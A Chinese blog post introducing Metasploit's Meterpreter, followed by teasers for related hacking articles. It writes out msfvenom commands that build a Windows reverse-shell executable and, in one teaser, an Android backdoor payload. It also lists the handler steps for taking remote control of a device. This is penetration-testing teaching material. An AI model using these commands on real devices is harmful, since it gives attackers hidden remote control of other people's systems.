白帽黑客為什麼喜歡用Meterpreter?

2020-12-13 張老師的IT訓練營

通過MsfVenom生成被控端

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.152.159 lport=5555 -f exe -o /root/123.exe

藉助於被控端,我們可以在kali上遠控連接被控端設備。

1.打開Metasploit

2.使用handler作為主控端,use exploit/multi/handler

3.設置payload,lhost,lport參數

4.exploit執行主控端

在成功連接被控端設備之後,出現了我們本期教程的主角:meterpreter 。

meterpreter 是一個高級的,動態的,可拓展的Payload,出現meterpreter 我們就有了shell,可以執行非常多的命令,去操控遠端設備。

執行命令:?或者help,顯示出可以執行的全部命令。

利用這些命令,我們可以完成非常多的操作,後續教程中不斷給大家一一講解。

meterpreter是如何工作的

meterpreter 是完全基於內存的DLL注入式的payload。

meterpreter 先注入合法的系統進程並建立stager,基於stager建立加密的TLS/1.0通信隧道,利用TLS隧道進一步加載後續的拓展模塊,實現更高級的功能。

相關焦點

  • 烏雲白帽系列之一:年齡最小的白帽黑客zph
    烏雲漏洞提交平臺匯集了上萬名的道德黑客,亦稱白帽黑客。他們對網絡安全有著極大的興趣,並通過個人技能和不斷地努力幫助企業挖掘和填補漏洞。
  • 「白帽黑客」揭秘:封閉培訓半年可年入十幾二十萬
    導師王英鍵早已在白帽黑客界大名鼎鼎,人稱「呆神」,這次他開辦培訓班,招募了全國不同省份的計算機少年。  少有群體能像「黑客」這樣,廣為人知又自帶神秘。網際網路技術飛速發展,給人們生活工作帶來日新月異的變化,但其背後隱晦複雜的網絡世界,風雲詭譎。  在利益的分岔路口,同樣擁有黑客技術,「白帽黑客」橫空出世,他們利用自己的專業技術,維護網絡安全,與黑客相生相剋,以正義之名,出手狠絕。
  • 「白帽黑客」的隱秘江湖:多轉型為工程師,對手來自世界各地
    李越目前是國內某大型網際網路安全公司的產品技術負責人,他和同一公司攻防實驗室的主任林偉,硬體安全工程師簡雲定、曾穎濤,安全漏洞挖掘和研發團隊的負責人鄭文彬都被稱為「白帽黑客」——與「黑帽黑客」相反,在虛擬的網絡江湖裡,他們是用黑客技術維護網絡安全的力量。林偉和鄭文彬是頂級黑客,他們的對手來自世界各地。
  • 冠以差評師的摩羯女Vs雙子女誰是差評白帽誰是差評黑客
    她們誰又是差評白帽,誰又是差評黑客呢?我的錢馬上要用!」哼!摩羯女拂袖而去,於是星座界不久後就傳來金牛女種種不利傳聞,比如水瓶對白羊竊竊私語:「餵聽說了嗎?摩羯女說別看金牛過得一副很好的樣子,她房子是二手的,老公家窮的不行!」,白羊女:「哦!我聽摩羯女說金牛女特別小氣!………」。瞧見了吧!開啟了差評,切切逢到星座界家族大會,摩羯女宣布說:「本星座界上次為星座族長評優拉票,眾人均出力拉票了,唯獨金牛女袖手旁觀,沒有家族觀念!」嘿!
  • 只聽說過黑帽和白帽?黑客的世界豈止這一點
    【PConline 雜談】時至今日,黑客在網際網路上已然發展成一個獨特的群體。當然,『黑客』只是一個統稱,他們當中有男有女,存在著好壞之分,也就是我們常說的黑帽與白帽。儘管我們熟知黑客的行事風格,卻仍舊難以在虛擬的網絡世界中,捕捉到他們的行蹤,加之其每次變幻莫測的攻擊手法,提前防範更是難上加難。因此,我們才需要了解不同類型的黑客以及各自的行動動機,縮小目標保護易受攻擊對象。只聽說過黑帽和白帽?黑客的世界豈止這一點其實,『黑客』一詞早期在美國的電腦界是帶有褒義的,泛指那些水平高超的電腦專家,程序設計人員。
  • 白帽黑客入門,諸神之眼-Nmap-使用指南
    Nmap是一款網絡掃描和主機檢測的非常有用的工具。 Nmap是不局限於僅僅收集信息和枚舉,同時可以用來作為一個漏洞探測器或安全掃描器。它可以適用於winodws,linux,mac等作業系統。歡迎大家關注我,帶你入門白帽黑客
  • 「補天杯」破解大賽火熱進行 白帽黑客60秒內攻破多款物聯網設備
    來自全國各地的企業、高校、民間的極客、白帽黑客、專家共同參與,以比賽競技和現場表演秀的方式發現物聯網智能設備存在的安全問題。多款智能路由器、智能攝像頭、智能門鎖、共享電動車等智能設備,均被挑戰選手在60秒內完成破解。經過多輪近8個小時緊張刺激的挑戰,參賽的10支團隊全部獲得破解成功獎,道格安全實驗室、山石網科、IRT三支團隊最終獲得最具價值獎,並將瓜分18萬元獎金池。
  • 中國一白帽黑客放言:將在本周日直播刪除扎克伯格的FB頁面
    對於這樣一位年輕的IT巨頭,來自中國的白帽黑客Chang Chi-yuan卻打起了「主意」。據彭博社報導,Chang在FB頁面表示,他將於本周日入侵並刪除扎克伯格個人的Facebook主頁,北京時間30號下午18點全程對外直播。Chang在個人資料頁面寫道,自己是Line 2016年BUG懸賞計劃名人堂中的一名特別貢獻者,不過曾經因為黑入公交系統而被起訴。
  • 黑客的7種類型和動機
    1、白帽黑客:白帽黑客不幹壞事,他們通常是計算機安全專家,擅長滲透測試和其它技術,為保護企業信息系統安全立下了汗馬功勞,所謂道高一尺,魔高一丈,白帽黑客和不懷好意的黑客將會長期共存,一直戰鬥下去2、黑帽黑客:和白帽黑客相反,他們專幹壞事,黑帽黑客通常指的是那些擅自闖入別人網絡或計算機系統的人,開發計算機病毒的人也屬於此類黑客,黑帽黑客在技術上往往比白帽黑客更高超,他們擅長發現系統漏洞,人為錯誤或懶惰配置,也有能力發明一種新型攻擊,人們習慣使用"Cracker"來稱呼黑帽黑客,他們的黑客動機通常都是為了錢。
  • 黑客真的能入侵你的攝像頭嗎?
    破解攝像頭好像對於黑客來說也是灑灑水了。手機攝像頭,電腦攝像頭,ipad攝像頭,前置後置……只要是個聯網的攝像頭,黑客就能破解,就算關機也沒卵用,黑客爸爸照樣入侵,視奸每個人的一舉一動,簡直滿足人內心深處的偷窺欲望,好刺激。
  • 為什麼黑客偏偏喜歡使用筆記本電腦?
    為什麼黑客偏偏喜歡使用筆記本電腦?黑客在很多人眼中,是個十分神秘的職業,在人們的印象中,他們總是會潛藏在黑暗中,對著個螢光屏不斷閃爍的字母,面無表情的敲打著鍵盤,他們通過網絡,能夠輕易的入侵別人的系統,甚至能夠直接操控,總之十分厲害,小編今天就來和大家說說這個話題。為什麼黑客都喜歡用筆記本電腦。
  • 黑客——網絡中的God
    我們大部分人都聽說過黑客,那麼,到底什麼才是黑客呢?黑客是一個中文詞語,皆源自英文hacker,隨著灰鴿子的出現,灰鴿子成為了很多假借黑客名義控制他人電腦的黑客技術,於是出現了「駭客」與"黑客"分家。實際上,黑客(或駭客)與英文原文Hacker、Cracker等含義不能夠達到完全對譯,這是中英文語言詞彙各自發展中形成的差異。Hacker一詞,最初曾指熱心於計算機技術、水平高超的電腦高手,尤其是程序設計人員,逐漸區分為白帽、灰帽、黑帽等,其中黑帽(black hat)實際就是cracker。
  • QQ 博弈黑客20年
    大二時,為了追求心儀的女孩,他決定送女孩一個5位數QQ號或者一個QQ靚號,為此用上了具備批量盜號功能的QQ木馬:「真的是年少不懂事,否則也不會幹這麼荒唐的事,你問問哪些大牛,幹過這事的都絕口不提。」2003~2009年國內病毒最為猖狂時期,一年新增病毒數量可超4000萬個,QQ木馬是一個重要分支,黑客基地、校園黑客聯盟等黑客網站都有針對QQ的專欄,甚至出現了「QQ黑客」這個帶有貶義的稱呼。為何是貶義?高手看不起那些只會用黑客工具的菜鳥,而QQ盜號形成一個黑色產業鏈,威脅多少人的利益,為世人不齒。
  • 如何用kwetza給安卓應用加後門
    我們先來生成一個payload:msfvenom -p android/meterpreter/reverse_tcp LHOST=10.42.0.211 LPORT=4444 R > beard.apk現在這款Android應用便能夠在目標設備上為我們提供一個meterpreter會話。對於移動版本殺毒產品,這款payload的表現如何呢?
  • 「白帽黑客」齊聚線上, 這場國際大賽重磅來襲
    來自美國、俄羅斯、德國、英國、日本、新加坡、韓國等國家的國際知名戰隊,以及來自清華大學、北京大學、EversecLab等國內高校和企業的共40支頂尖「白帽黑客」戰隊齊聚雲端,對基於內生安全理論及技術研製的工業網際網路擬態防禦系列設備進行為期三天的高強度攻擊。